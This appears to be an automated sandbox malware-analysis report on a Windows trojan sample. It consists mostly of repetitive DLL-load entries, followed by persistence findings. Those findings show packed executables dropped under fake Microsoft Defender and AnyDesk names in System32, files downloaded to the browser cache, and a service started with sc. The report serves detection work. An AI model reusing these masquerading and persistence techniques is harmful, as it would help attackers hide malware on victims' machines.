Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7894355 push rsi; ret 0_2_00007FF6C7894356
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1BAF45 push rsi; ret 5_2_00007FF76E1BAF46
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1BC572 push rax; retf 5_2_00007FF76E1BC581
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA96784D push rcx; retf 003Fh7_2_00007FF7AA96784E
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA95CD54 pushfq ; retf 0000h7_2_00007FF7AA95CD55
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDC4355 push rsi; ret 25_2_00007FF71DDC4356
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Executable created and started: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Executable created and started: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\AnyDeskShellIntegration_Update.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\AnyDeskShellIntegration.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\AnyDeskShellIntegration_Update.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\AnyDeskShellIntegration.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7852840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW, 0_2_00007FF6C7852840
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Window / User API: threadDelayed 7823
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Window / User API: threadDelayed 2175
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Window / User API: threadDelayed 372
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Window / User API: threadDelayed 7704
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Window / User API: threadDelayed 2294
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Dropped PE file which has not been started: C:\Windows\System32\AnyDeskShellIntegration_Update.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Dropped PE file which has not been started: C:\Windows\System32\AnyDeskShellIntegration.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Dropped PE file which has not been started: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | API coverage: 9.4 %
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe TID: 5064 | Thread sleep time: -85000s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 6564 | Thread sleep time: -782300s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 6564 | Thread sleep time: -217500s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe TID: 3704 | Thread sleep count: 372 > 30
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe TID: 3704 | Thread sleep time: -1116000s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448 | Thread sleep count: 7704 > 30
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448 | Thread sleep time: -770400s >= -30000s
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448 | Thread sleep count: 2294 > 30
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe TID: 2448 | Thread sleep time: -229400s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Last function: Thread delayed
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C78832B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6C78832B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E1A9B94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_00007FF76E1A9B94
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Code function: 7_2_00007FF7AA9590E0 FindFirstFileExW, 7_2_00007FF7AA9590E0
